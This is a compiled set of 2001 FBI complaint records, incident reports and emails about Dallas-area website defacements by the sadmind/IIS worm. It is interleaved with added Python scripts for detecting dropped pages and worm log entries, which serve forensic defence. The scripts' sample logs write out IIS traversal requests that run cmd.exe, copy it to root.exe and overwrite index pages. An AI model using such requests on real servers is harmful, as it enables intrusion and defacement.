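2001-05-05 04:32:43 202.107.117.8 GET /scripts/root.exe 502 80 - -
2001-05-05 04:35:10 192.0.2.10 GET /default.htm 200 80 - -
2001-05-05 04:36:00 192.0.2.11 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe 200 80 - -
"""

if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG)
    for h in hits:
        print(h["client"], h["uri"], "|", ", ".join(h["reasons"]))
    print("by source:", sources_by_hits(hits))
```

A 200 on the cmd.exe request followed by a root.exe request from the same address is the sequence to look for when deciding whether the traversal succeeded; the status codes are left in the findings' source lines for exactly that follow-up.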
Hallmark Financial Services, Inc. primarily markets, underwrites and finances non-standard
automobile insurance in the state of Texas. Secondarily the Company provides fee based 
claims adjusting, policy processing, cash management and related services for affiliates and 
third parties. These operations are carried out through its integrated insurance group known as 
the HALLMARK INSURANCE GROUP. 


Our Mission Is To: 


Provide fairly priced, quality products and services to our customers 
Offer rewarding opportunities to our team members and business partners 
Perform with integrity, teamwork and excellence.




Send mail to webmaster@hallmarkgrp.com with questions or comments about this web site. 
Copyright © 1999 Hallmark Financial Services 
Last modified: March 24, 2000 


http://www.hallmarkgrp.com/ 5/21/01


FD-71 (Rev. 3-27-95)
Complaint Form

NOTE: Hand print names legibly, handwriting satisfactory for remainder.
Indices: Negative / See below

Subject's name and aliases: UNKNOWN
Character of case: Computer Intrusion

Complainant: [redacted]   Protect Source
Complaint received: Personal / Telephonic   Date: 5/8/2001   Time: 2:00 pm

Address of Subject:
Complainant's address and telephone number: [redacted]
Complainant's DOB:
Race / Sex / Height / Build / Birth date and birth place / Social Security Number / Scars, marks and other data:
Employer: ESI
Address / Telephone:
Vehicle Description:

Facts of Complaint:
Complainant claims his company's, ESI, website was intruded/hacked
by Chinese individuals. Complainant has the log files associated with
the intrusion. The company's operating system is Windows NT 4.0. The
monetary loss due to manpower hours to replace the website is
approximately $2,600.00. It was discovered on Monday morning but
believed to have taken place on Friday evening. An analysis of their
system was conducted.


b3 
b6 
b7C 
b7E 


b6 
b7c 




LJBB Investment Group, LP

For information on DigitalConvergence.com, see here.

For information on Critical Devices, see here.

For information on the Thermal Angel by Estill Medical Technologies, see here.

Questions?

http://www.ljbb.com/ 5/21/01


Texas Triathlon, Motorsport Automobile Driving Event

TexasTriathlon.com

The Texas Triathlon is an annual Motorsport Automobile Driving event held in the
Dallas, TX area. It includes drag racing, road racing, and autocross. 2001
event has already passed, and 2002 event has NOT been scheduled yet.

For our mailing list, calendar, etc., please join our YahooGroup below.

Click to subscribe to texastriathlon

http://www.texastriathlon.com/ 5/21/01


North Texas Viper Club        Page 1 of 2


North Texas Viper Club


Includes a newsletter, calendar, pictures and technical information for the
Dodge Viper.


Home | Calendar | Photos | Newsletter
Maintenance | Club Info | Feedback | Links


To order poster
This is the new official website for the North Texas Viper Club.


For current email threads, calendar, etc., join our YahooGroup by clicking "Join Now".


http://www.northtexasviperclub.com/ 5/21/01


FD-71 (Rev. 3-27-95)


Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.


Indices: [ ] Negative [ ] See below


Subject's name and aliases        Character of case


b3
Unknown
b6
b7C
b7E
Complainant [X] Protect Source
Global Knowledge
Complaint received
[ ] Personal [X] Telephonic    Date 5/08/2001    Time 1:15 pm
Address of Subject        Complainant's address and telephone number
1057 S. Sherman Street
Richardson, Tx 75081
Complainant's DOB        Sex
Male
Race    Height    Hair    Build    Birth date and birth place
Age    Eyes    Complexion    Social Security Number
Scars, marks and other data
Employer        Address        Telephone
Vehicle Description
Facts of Complaint
Complainant claims his company website, Global Knowledge, was
intruded/hacked by unknown individuals. [Redacted] stated that he saved        b6
all the associated log files associated with the intrusion. Financial        b7C


loss is undetermined. [Redacted] stated that [illegible] was inserted on some of
the website pages. [Redacted] phone number is [redacted].


Forwarded to Securities Squad.


Do not write in this space.


b6
b7C


(Complaint received by)        BLOCK STAMP


05/14/01        Male


UNSUB(S)        Computer Fraud & Abuse - Impairment
WCC-EC
264A


b6
Global Knowledge


1057 S. Sherman St, Richardson, TX
214.576.0313


C, of Global Knowledge, called to say that their company,
who has their own ISP, has been targeted twice in the past week
with intrusions of four files that damage their ISP. Their phone
service for this ISP is Sprint. The last occurrence was on
Friday, the 11th at 12:49 pm. The intruder dropped four files into
their root directories causing various damage to their system,
loss of files, etc. Global Knowledge is a training organization.
This happened about a month ago and [redacted] called the FBI, but no        b6
one called him back.        b7C


b6
b7C


Global Knowledge | Nortel Networks Training | News        Page 1 of 1


Global Knowledge Nortel Networks Training


What's cLearning?
Real world classroom instruction, taught by industry professionals and
delivered as hands-on, demonstration, and tutorial training ...


Roadshow!
If your position requires knowledge of the Nortel Networks Meridian 1
Communications System, then a Roadshow is the right course for you ...


New eLearning Products
What's eLearning?


More people are turning to self-paced learning they can do on their own time,
in their own learning style and from their own computer ...


eSentials!
Presenting eSentials, a subscription service of Nortel Networks product
information designed to help you recall important data when you need it ...


New vLearning Products
What's vLearning?


Students can actively participate in real time from almost anywhere,
interacting with the instructor and each other ...


Global Knowledge Nortel Networks Training


http://get.globalknowledge.com/norteltraining/news/_main.asp 5/21/01


View Message        Page 1 of 1


AT&T BUSINESS INTERNET SERVICES


View Message


From: [redacted]        b6 b7C
To: "dallas@fbi.gov" <dallas@fbi.gov>
Cc:

Date: Thu, May 10, 2001, 18:50:23


Subject: Attn: Computer Squad


Intrusion/Hacker into our web site. On 5/7/01 our web site was hacked and
changed to the following "fuck USA Government", "fuck PoizonBOx",
contact:sysadmcn@yahoo.com.cn then again on 5/9 or 5/10 with the same
changes.


Is there any way we can find out who is doing this?


[redacted]
Schmidt & Stacy Consulting Engineers, Inc


2711 N. Haskell Ave. 400 Cityplace
Dallas, Texas 75204
Voice: (214)-874-0200 Fax: (214)-824-1155


b6
b7C


Email CADD dwgs. To: [redacted]


5/10/01


        Page 1 of 2


SCHMIDT &


STACY CONSULTING
ENGINEERS


SCHMIDT & STACY Consulting Engineers, Inc. provides Mechanical, Electrical, Plumbing, Fire Protection,
Life Safety, and Energy Management Systems engineering design services for a diverse range of projects
including high-rise buildings, hotels and resorts (i.e., Ritz Carlton, Marriott, Hilton, etc.), multi-family
apartments/lofts, retail pads (i.e., Autonation and Bass Pro Shops across the country), institutions and
manufacturing facilities. The firm was founded in 1992 by David A. Schmidt, P.E. & Edgar A. Stacy,
P.E. and currently includes a staff of 36 professionals & support. The two principals have over 45 [...]
years of experience in consulting engineering and the project managers' combined experience exceeds [...]
years. In the past several years, the principals of Schmidt & Stacy have designed over ten million [...]
of shell office, hotel, and industrial space and have continued to provide repeat business for
owners/developers and local/national architects in 34 states nationwide.


Our CADD Department is equipped with Dell Pentium III Workstations running AutoCAD 2000 in a
Windows NT* network environment.


* Windows NT is a registered trademark of Microsoft.


http://www.schmidt-stacy.com/ 5/21/01


        Page 2 of 2


Schmidt & Stacy Consulting Engineers
400 Cityplace
2711 N. Haskell Ave.
Dallas, Texas 75204
Voice: (214) 874-0200 Fax: (214) 824-1155


http://www.schmidt-stacy.com/ 5/21/01
FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Character of case


Matter


Subject's name and aliases


contact:sysadmcn@yahoo.com.cn


Protect Source


Complainant


The Pilcher's Group


Complaint received


Date 05/09/2001    Time am


[ ] Personal [ ] Telephonic


Complainant's address and telephone number


7001 Preston Rd, Suite 200, Dallas
214/520-2800


Complainant's DOB


Address of Subject


Birth date and birth place


Scars, marks and other data


Employer        Address        Telephone


Vehicle Description


Facts of Complaint


Age    [ ] Female


Subject's
Description


Complainant (C) stated that his business, The Pilcher's
Group, has been victimized due to a website hacking, occurring on
05/04/2001.


C's index page was removed and replaced with a page that reads as
follows: fuck USA Government
fuck PoizonBOx


contact:sysadmcn@yahoo.com.cn


C's company computer specialist was able to remove said index
page; however, C was concerned that the hacking could occur again.


Do not write in this space.


(Complaint received by)        BLOCK STAMP


b6
b7C


b3
b6
b7C
b7E


b6
b7C


Attached is a facsimile copy of the message C's company
received.


This communication is being referred to SA [redacted],
NIPCIP Squad, Dallas Division, for whatever action deemed
appropriate.


The
Pilchers
Group


Facsimile Cover Sheet


To: FBI Duty Desk        Date: May 9, 2001
From: [redacted]        Time: 4:00 PM


Subject: Business Website Hacking        Fax#: 214-922-7459


Number of pages including this page: [illegible]
*** Please call 214.520.2800 if error occurs in transmission ***


Original to follow in mail: Yes    No X


Comments:

As per my phone report to you this afternoon, sometime between last Friday, May 4th and
this afternoon someone "hacked" our business web site at www.pilchers.com, replacing the index
(opening) page with the attached. On screen the attached was a black background with red
letters. My Web Manager has since removed the page and replaced it with a temporary index
page that returns the links to our normal site. Given that we just discovered this earlier this
afternoon, we have not yet completed our review, but at this time we believe the index page was
the only file changed.


Thank you for whatever assistance you may offer in eliminating this threat in the future.
Please do not hesitate to contact me for further information.


The material transmitted herewith is intended only for the use of the individual to whom this transmittal is addressed. If the
reader is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of the material
transmitted herewith is strictly prohibited.


7001 Preston Road, Suite 200, Dallas, Texas 75205


b6
b7C


fuck USA Government
fuck PoizonBOx


contact:sysadmcn@yahoo.com.cn


http://www.pilchers.com/


5/9/01


The Pilchers Group


http://www.pilchers.com/
The Pilchers Group Biography        Page 1 of 1


Company Information... 


THE PILCHERS GROUP 


The Pilchers Group is a real estate investment and development concern based in Dallas, Texas. 
Pilchers' current projects are located throughout Texas, as well as in California and Oklahoma. 


Pilchers and affiliates have acquired or developed in excess of $100 million in real estate assets over the 
past ten years. Pilchers' development activities are primarily in the area of retail shopping centers or 
build-to-suit properties for national tenants. Additionally, Pilchers' developments have included office, 
industrial and single family residential, as well as land development activities. 


Over the course of the last ten years, Pilchers' Dallas office has overseen the acquisition of in excess of 
1,000,000 square feet of retail shopping center space for its own account. As a part of its retail 
development activity, Pilchers is regularly involved in build-to-suit construction for national and
regional tenants. 


During the course of the coming year Pilchers intends to add to its current portfolio through additional 


acquisitions of existing retail shopping center space, as well as to seek retail development opportunities 
throughout the southwestern United States. 


Go Back 


http://www.pilchers.com/coinfo.html 5/21/01 


FD-71 (Rev. 3-27-95)


Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Subject's name and aliases        Character of case


Unsubs


[illegible]


Complaint received


[ ] Personal [ ] Telephonic    Date 05/10/2001    Time am


Address of Subject        Complainant's address and telephone number


Complainant's DOB


Scars, marks and other data


Employer        Address        Telephone


Vehicle Description


Facts of Complaint


[Redacted], [illegible] at Northwest High School,
Denton, Texas, advised a group of people are hacking the
school's website and putting in messages that read "[...]
government", "fuck poison", "BOx".

He stated they were able to trace the hacking to Nanjing
University in Peking, China, address
www.NJU.edu.cn/njue/profile/profile/president.htm.


Subject's
Description


(Complaint received by)        BLOCK STAMP


b6 
b7C 


b6 
b7c 


b6 
b7C 


b6
May 8, 2001
From: [redacted]

For Perry Equipment Corp.


Wolters Industrial Park
Mineral Wells TX, 76067


To: FBI

2601 Meacham Blvd
Suite 500

Ft. Worth TX, 76137


Attn: [redacted]


To whom it may concern,


On Sunday morning, May 6, 2001 I discovered that the website, www.pecousa.com, for
Perry Equipment Corp. had unauthorized changes made to it. Attached to this letter is the
actual page as it appeared on the Internet. It was a Black Background with Red text. I
changed the background to white so I could print it. Also attached in text format is the
file itself. Four files were placed in the root folder of the server, default.htm, default.asp,
index.htm, and index.asp. They were also placed in all other subfolders of the same
server. All four files are identical except for the name. The timestamp on the files was
2:50 PM, May 5, 2001.


The server is Microsoft NT 4.0 with service pack 3.0 and IIS 4.0. Our other two servers
had service packs 4 and 5 on them. No changes were made to those servers.


Please let me know if I can be of any further assistance to you.


Sincerely,
b6


b7C


940.325.2575


b7E


5/8/2001 3:04:05 PM


Default.txt


<html><body bgcolor=black><br><br><br><br><br><br>

<table width=100%><td><p align="center">

<font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center"><font size=7 color=red>

fuck PoizonBOx<tr><td><p align="center">

<font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>
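The letter above describes what the worm left on disk: four identically named pages, identical in content, written into the root folder and every subfolder, all carrying the same timestamp. The Python script below is an added example, not an exhibit from this file and not anything the complainant ran. It walks a web root, groups index/default pages by SHA-256 so mass-dropped copies cluster together, records each file's modification time for the incident timeline, and flags content carrying the defacement strings quoted in this file. The directory layout and file contents it builds in a temporary directory are constructed for the demonstration.

```python
"""Triage a web root for dropped defacement pages (added example, not from the file)."""
import hashlib
import os
import tempfile
from datetime import datetime

# File names the letter above says were dropped (compared case-insensitively).
PAGE_NAMES = {"default.htm", "default.asp", "index.htm", "index.asp"}
# Strings from the defacement text in this file; any one is enough to flag a page.
MARKERS = (b"PoizonBOx", b"sysadmcn@yahoo.com.cn")


def triage(webroot):
    """Map sha256 -> [(relative path, mtime, carries marker)] for every
    index/default page under webroot, so identical copies group together."""
    groups = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower() not in PAGE_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            digest = hashlib.sha256(data).hexdigest()
            mtime = datetime.fromtimestamp(os.path.getmtime(path)).isoformat(timespec="seconds")
            flagged = any(m in data for m in MARKERS)
            groups.setdefault(digest, []).append((os.path.relpath(path, webroot), mtime, flagged))
    return groups


def suspicious(groups):
    """Keep a hash group if its content carries a defacement marker, or if the
    same bytes sit under more than one directory (the mass-drop signature)."""
    hits = []
    for digest, members in groups.items():
        dirs = {os.path.dirname(rel) for rel, _, _ in members}
        if any(flag for _, _, flag in members) or len(dirs) > 1:
            hits.append((digest, sorted(members)))
    return hits


# Constructed stand-in for the dropped page, carrying the same markers as the exhibit.
DEFACEMENT = (b'<html><body bgcolor=black><p align="center">'
              b"<font size=7 color=red>fuck PoizonBOx</font>"
              b"<font size=4 color=red>contact:sysadmcn@yahoo.com.cn</font></body></html>")
LEGIT = b"<html><body>Perry Equipment Corporation</body></html>"


def build_sample_tree(root):
    """Constructed layout: the four files in the root and in 'products',
    one untouched legitimate page in 'images', one non-candidate file."""
    for sub in ("products", "images"):
        os.makedirs(os.path.join(root, sub))
    for sub in ("", "products"):
        for name in sorted(PAGE_NAMES):
            with open(os.path.join(root, sub, name), "wb") as fh:
                fh.write(DEFACEMENT)
    with open(os.path.join(root, "images", "index.htm"), "wb") as fh:
        fh.write(LEGIT)
    with open(os.path.join(root, "main2.htm"), "wb") as fh:
        fh.write(LEGIT)


def run_demo():
    """Build the sample tree in a temp dir; return (all groups, suspicious groups)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        groups = triage(root)
        return groups, suspicious(groups)


if __name__ == "__main__":
    _, found = run_demo()
    for digest, members in found:
        print(f"sha256 {digest[:16]}...  {len(members)} copies")
        for rel, mtime, flagged in members:
            print(f"  {mtime}  {'DEFACED' if flagged else '       '}  {rel}")
```

On a real server, point triage() at the web root before any cleanup: the modification times are what fix the moment of the drop, as the 2:50 PM timestamp did in the letter above, and a hash shared by pages in many directories is worth examining even when the content carries no familiar marker.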


PERRY EQUIPMENT CORPORATION, Filtration Element[...] Mineral Wells        Page 1 of 2


[...] INDUSTRY SINCE 1930
WITH


ENGINEERED FILTRATION [...]


Corporate Offices: PERRY EQUIPMENT CORPORATION
P O BOX 640 - WOLTERS INDUSTRIAL PARK
MINERAL WELLS, TEXAS 76067 USA


CALL: (940) [...]
FAX: 940-3[...]


e-mail - sales@pecousa.com


http://www.pecousa.com/main2.htm 5/21/01


From: NIPC-WATCH


To: [redacted]
Date: 5/15/01 4:23PM
Subject: China Intrusion


Subject: Cyber Incident Report Form


Date: [...] 2001 18:17:26 -0500 (CDT)
From: [redacted]
To: nipc.watch@fbi.gov        b7C


Report_date_time=14 May 2001

Name=[redacted]

Title=

Telephone_Fax_Number=

Email=

Organization=Rockwall Controls Company

Addrs_Street=306 E. Washington

City=Rockwall

State=Texas

Zip_Code=75087

Country=USA

Question1_Organization=SAME
Question1_Contact_Info=SAME
Question1_Tele_Number=SAME
Question1_Street=SAME
Question1_City_State_Zipcd=
Question1_Country=
Question1_Email=

Question2_Location=At above address
Question3_Date_Time=Monday 7 May 2001 about 21:00h to 00:00h
Question4_Critical=No
Question5_Remarks=No Remarks
Question6_nature_of_prob=Intrusion
Question6_nature_of_prob=Unauthorized root access
Question6_nature_of_prob=Web site defacement
Question6_nature_of_prob=Compromise of system integrity
Question6_other=

Question7_exp_problem=No
Question7_Remarks=No Remarks
Question8_method_of_attack=Vulnerability exploited
Question8_Remarks=(I think) exploited MS IIS Sample Website vulnerability to upload ROOT.EXE and
then execute commands with CMD.EXE to replace default web pages (index.htm, default.asp, etc.)
Question9_sus_perpetrators=Other
Question9_Remarks=Chinese hackers
Question10_ip_addrs=202.103.134.218
Question11_evid_of_spoof=Unknown
Question12_oper_systems=Windows [...]
Question12_Remarks=NT Workstation, [illegible]
Question13_security_infrasture=Firewall
Question14_attack_loss_info=Unknown
Question14_Remarks=No Remarks
Question15_damage_systms=No
Question15_Remarks=No Remarks
Question16_what_actions=Backup of affected system(s)
Question16_what_actions=Other
Question16_Remarks=Removed IIS sample website & other nonessential options. Reduced file
permissions to minimum necessary.
Question17_Field_Office=
Question17_fieldoff_inform=No
Question18_agency_inform=No
Question18_State_local_Police=
Question18_Inspector_General=
Question18_CERT-CC=
Question18_FedCIRC=
Question18_JTF-CND=
Question18_Other=
Question19_date_of_last_update=14 May 2001
Question19_org_work_update=in house
Question20_POC_Information=
Question20_sys_adm_contract=No
Share_Info_With=Infrastructure Orgs
Question21_remarks=Defacement was anti-USA government and anti-PoizonBOx.
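The report above ties the defacement to cmd.exe being run through IIS, and several complainants in this file say they could not find the offending request in their logs. The Python script below is an added example; it is not part of the file, the report, or CERT advisory CA-2001-11. It shows what to look for in an IIS W3C extended log: a ".." followed by an overlong UTF-8 or double-encoded path separator (the MS00-078 folder-traversal bug that CA-2001-11 names as the worm's IIS vector) reaching cmd.exe, a request for root.exe (the copy the report above mentions), and a query string that echoes text into an index or default page. The log lines, the client addresses (RFC 5737 documentation ranges) and the field layout are constructed for the demonstration.

```python
"""Flag IIS W3C log records matching the sadmind/IIS worm's IIS stage (added example)."""
import re
from urllib.parse import unquote_to_bytes

# Constructed log in the W3C extended format IIS 4.0 writes; addresses are documentation ranges.
LOG_TEXT = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-05 14:50:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-05 14:50:01 198.51.100.23 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-05 14:50:02 198.51.100.23 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+copy+c:\\winnt\\system32\\cmd.exe+root.exe 502
2001-05-05 14:50:03 198.51.100.23 GET /scripts/root.exe /c+echo+fuck+USA+Government+>+c:\\inetpub\\wwwroot\\index.htm 502
2001-05-05 14:50:04 198.51.100.23 GET /msadc/..%255c../..%255c../winnt/system32/cmd.exe /c+dir 200
2001-05-05 14:51:00 192.0.2.10 GET /default.asp - 200
2001-05-05 14:52:00 192.0.2.11 GET /images/logo.gif - 304
"""

# '..' followed by a separator IIS should have rejected: plain, overlong UTF-8
# for '/' (%c0%af) or '\' (%c1%9c, %c1%1c), or, after double decoding, %255c.
TRAVERSAL = re.compile(rb"\.\.(?:[/\\]|\xc0\xaf|\xc1\x9c|\xc1\x1c)")
SHELL = re.compile(rb"(?:cmd|root)\.exe")          # root.exe: the copy named in the report above
OVERWRITE = re.compile(rb">\S*(?:index|default)\.(?:htm|html|asp)")  # echo ... > index.htm


def decode_uri(uri):
    """Percent-decode twice into bytes: the overlong sequences are not valid text,
    and %255c only becomes a backslash on the second pass, which is the bug's trigger."""
    return unquote_to_bytes(unquote_to_bytes(uri)).lower()


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def classify(entry):
    """Reasons a record looks like the worm; an empty list means a clean request."""
    stem = decode_uri(entry.get("cs-uri-stem", ""))
    query = decode_uri(entry.get("cs-uri-query", ""))
    reasons = []
    if TRAVERSAL.search(stem):
        reasons.append("directory traversal")
    if SHELL.search(stem):
        reasons.append("command shell request")
    if OVERWRITE.search(query):
        reasons.append("page overwrite")
    return reasons


def find_worm_requests(text):
    """Return the flagged records with time, source, status and reasons.
    A 200 on a cmd.exe request means the command ran; IIS commonly answers
    502 when it ran but produced no CGI headers; 404 or 403 means it was refused."""
    hits = []
    for entry in parse_w3c(text):
        reasons = classify(entry)
        if reasons:
            hits.append({"when": entry["date"] + " " + entry["time"], "ip": entry["c-ip"],
                         "uri": entry["cs-uri-stem"], "query": entry["cs-uri-query"],
                         "status": entry["sc-status"], "reasons": reasons})
    return hits


def by_source(hits):
    """Count flagged requests per client address: the 'offending ip address' a
    complainant is asked for."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_worm_requests(LOG_TEXT)
    for h in found:
        print(h["when"], h["ip"], h["status"], h["uri"], h["query"], "|", ", ".join(h["reasons"]))
    print("by source:", by_source(found))
```

Because the worm's request never goes through a normal page, it leaves no trace in the site's own content, only in the server log and on disk; the log record is what links the dropped pages to a source address and a time, which is why the IP address in a report like the one above should be read straight from such records rather than from the defacement text.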


Rockwall Controls Company: [...] Solutions


Job Profiles


http://www.rockwallcontrols.com/ 5/21/01


FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Character of case


CITA MATTERS


Subject's name and aliases


UNSUB;


Complaint received


[ ] Personal [ ] Telephonic    Date 05/07/2001    Time 3:30 pm


Complainant's address and telephone number


1923 Waldrop [...], TX 75061


Telephone [redacted]
Complainant's DOB
11/13/1950    Female

Race    Height    Build    Birth date and birth place


Scars, marks and other data


Address of Subject


Subject's
Description


Employer        Address        Telephone


Vehicle Description


Facts of Complaint

Complainant, above address and telephone number, [redacted],
advised unknown individual had corrupted/altered both of her websites on
the Internet, as well as that of her supervisor's. [Redacted] explained
her account is with America On Line; the hosting company that designed the
website and supposedly has control of the website is Waldron ORG; and the
products to be sold on the website are Herbalife International.
Additionally, [redacted] advised she has anti-virus protection. She
stated the perpetrator left the following E-mail address on the new
corrupted website: SYSADMCN@YAHOO.COM.CN. She furnished her two
websites as follows: www.EnergyTex.Com and www.Reach4theSkye.Com; and
her Supervisor's website as www.Surf4Success.com. [Redacted] advised


Do not write in this space.


1 - Intelligence Squad


(Complaint received by)        BLOCK STAMP


b6
b7C


b6
b7C


b6
b7C


[...] teaching [...] is also corrupted: www.Wealth-Builders-rem.Com.
[Redacted] stated she could be contacted at above
telephone number for further information, etc.


FBI UI search negative regarding [redacted].


        Page 1 of 1


To: [redacted]

Sent: [...] 2001 1:26 PM
Subject: Hacking incident


I'm on your e-mail list. Hope you don't mind my e-mailing you directly.


Last year I reported numerous 3rd party e-mail attempts to our proxy server from IP addresses
in mainland China, to the Chinanet authorities, who eventually responded that they had taken
care of the "situation."


On May 6 and 7 this year our proxy server was hacked into and our GroupWise WebAccess
page was defaced with an obscene message "f*k USA government, f*k PoisonBox."
Numerous files on the root drive of the server were written over. But, we didn't have any major
damage [illegible] the tech's time to clean up the server, so I haven't reported it to NIPC.


We never figured out how the hacker got in. A scan of the server found no trojan horses
lurking anywhere. We figure our IP address is on the hackers' list of targets because I turned
them in last year.


Anyway, all of this is just for your information and I was wondering if you had heard of any
other defacements in the Dallas/Fort Worth area. Are you aware of specific hacker programs
that might have been used for this type of attack? Any information would be helpful.


Thanks,


[redacted]


777 Main Street, Suite 3600
Fort Worth, Texas 76102-5341
Direct Phone: [redacted]

Direct Fax: [redacted]

E-Mail: [redacted]
Sent for infragard_dallas@yahoo.com


Date: Thu, 10 May 2001 15:52:02 -0700 (PDT)
From: infragard_dallas@yahoo.com
Subject: Hacking Incident
To: [redacted]


[Redacted],


I read over your hacking email and it resembles the
worm advisory reported on cert.org - sadmind/IIS.

Take a look at the advisory and call me on Monday with
more details.


Thank you
[redacted]
Intelligence Research Specialist


Dallas FBI
214-574-4680
Inbox for infragard_dallas@yahoo.com


Date: Fri, 11 May 2001 04:47:58 -0500
From: [redacted]


To: infragard_dallas@yahoo.com


Subject: Re: Hacking Incident


Thanks so much! I have read the advisory and contacted our tech
support to find out if they applied the IIS patch mentioned. I know they
changed rights to directories and files on the server to beef up security
and ran Windows Update to get NT security patches, but I'm not sure
what all else they did. We are running IIS 4.0.


I'll try to follow up with you on Monday. Thanks again.

>>> <infragard_dallas@yahoo.com> 5/10 5:52p >>>

Hi [redacted]

I read over your hacking email and it resembles the
worm advisory reported on cert.org - sadmind/IIS.

Take a look at the advisory and call me on Monday with
more details.

Thank you
b6
b7C


Intelligence Research Specialist
Dallas FBI
214-574-4680
HARRIS, FINLEY & BOGLE, P.C.


ATTORNEYS AT LAW


777 MAIN STREET - SUITE 3600
FORT WORTH, TEXAS 76102-5341


Harris, Finley & Bogle, a Professional Corporation, is-engaged in the general 
practice of civil law in Fort Worth, Texas, and has the highest rating by 
Martindale-Hubbell Law Directory. The firm consists of nineteen lawyers, four 
paralegals, and support staff. 


The firm has a general business practice and provides a variety of legal services 
to its clients: 


We handle most legal needs of businesses of all sizes, including their 
organization, financing, and operation. 


We represent both state and national banking institutions. Our work primarily 
consists of loan documentation, work outs, litigation, regulatory matters, and 
other banking matters. 


We practice oil and gas law, including leasing, financing, title examination, and 
the purchase and sale of producing properties. 


In the real estate area we represent buyers, sellers, developers, and lenders in 
real estate sales, acquisition, construction, financing, and developing. 


Our estate planning practice includes estate and gift tax planning and the 
preparation of wills, trusts, and other estate planning documents. 


We practice trial law before state and federal courts representing both plaintiffs 
and defendants in all types of litigation. 


Our bankruptcy practice primarily involves representing creditors and trustees in 
liquidation and reorganization proceedings. 


We have a commitment to providing quality legal services on a prompt basis and
at a reasonable cost to our clients.


We welcome questions concerning our fees and any other matters involving the 
representation of our clients. 


All lawyers in the firm are members of the American Bar Association, the State 
Bar of Texas, and the Tarrant County Bar Association. 


HARRIS, FINLEY & BOGLE, P.C.
777 MAIN STREET - Suite 3600
FORT WORTH, TX 76102-5341


5/21/01 


From: NIPC-WATCH


To: [redacted]
Date: 5/9/01 11:19PM
Subject: Web site defacement


The Watch received the following web site defacement:


Subject: Cyber Incident Report Form


Date: [...]
From: [redacted]
To: <nipc.watch@fbi.gov>


Report_date_time=5/9/01 16:30

Title=

Telephone=

Email=

Organization=DSX Access Systems, Inc.

Addrs_Street=10731 RockWall Rd.

City=Dallas

State=Tx

Zip_Code=75238

Country=USA

Question1_Organization=Same
Question1_Contact_Info=
Question1_Tele_Number=
Question1_Street=Same
Question1_City_State_Zipcd=
Question1_Country=
Question1_Email=
Question2_Location=64.158.160.151
Was attacked by Chinese with vulgarity towards USA Government
repeated attack at 11:02 same day
Question3_Date_Time=7:35 05/07/01
Question4_Critical=Yes
Question5_crit_infrasture=Telecommunications
Question5_Remarks=No Remarks
Question6_nature_of_prob=Intrusion
Question6_nature_of_prob=Unauthorized root access
Question6_nature_of_prob=Web site defacement
Question6_nature_of_prob=Compromise of system integrity
Question6_nature_of_prob=Unknown
Question6_other=
Question7_exp_problem=No
Question7_Remarks=No Remarks
Question8_method_of_attack=Trojan Horse
Question8_method_of_attack=Trapdoor
Question8_Remarks=No Remarks
Question9_Remarks=No Remarks
Question10_ip_addrs=
Question11_evid_of_spoof=Unknown
Question12_oper_systems=NT
Question12_Remarks=No Remarks
Question13_security_infrasture=Firewall
Question13_security_infrasture=Packet filtering
Question14_attack_loss_info=Unknown
Question14_Remarks=No Remarks
Question15_damage_systms=No
Question15_Remarks=No Remarks
Question16_what_actions=Backup of affected system(s)
Question16_what_actions=Log files examined
Question16_Remarks=No Remarks
Question17_Field_Office=
Question17_fieldoff_inform=No
Question18_agency_inform=No
Question18_State_local_Police=
Question18_Inspector_General=
Question18_CERT-CC=
Question18_FedCIRC=
Question18_JTF-CND=
Question18_Other=
Question19_date_of_last_update=
Question19_org_work_update=
Question20_POC_Information=
Question20_sys_adm_contract=No
Share_Info_With=Infrastructure Orgs
Question21_remarks=No additional remarks
Sent for infragard_dallas@yahoo.com


Date: Thu, 10 May 2001 16:04:28 -0700 (PDT)
From: infragard_dallas@yahoo.com
Subject: Web site defacement
To: [redacted]


I read over your computer intrusion report and it
resembles the "worm" advisory reported on
www.cert.org:
CA-2001-11  sadmind/IIS.


Take a look at the advisory and call me on Monday with
more details.


Intelligence Research Specialist
Dallas - FBI
214-720-2200
Inbox for infragard_dallas@yahoo.com


From: [redacted]        b6 b7C
To: infragard_dallas@yahoo.com


Subject: Re: Web site defacement
Date: Thu, 10 May 2001 19:10:13 -0500


Thank you so much


I will read it and get back to you


[redacted]
DSX Access Systems, Inc.


----- Original Message -----
From: <infragard_dallas@yahoo.com>
Sent: Thursday, May 10, 2001 6:04 PM
Subject: Web site defacement


> I read over your computer intrusion report and it
> resembles the "worm" advisory reported on
> www.cert.org:
> CA-2001-11 sadmind/IIS.
>
> Take a look at the advisory and call me on Monday with
> more details.
>
> [redacted]
> Intelligence Research Specialist
> Dallas - FBI
> 214-720-2200
Inbox for infragard_dallas@yahoo.com


From: [redacted]        b6
To: infragard_dallas@yahoo.com
Subject: Re: Web site defacement
Date: Tue, 15 May 2001 16:05:48 -0500


Just another update.
I have been over my log files and can't find the offending IP address
or URL that the attack came from,
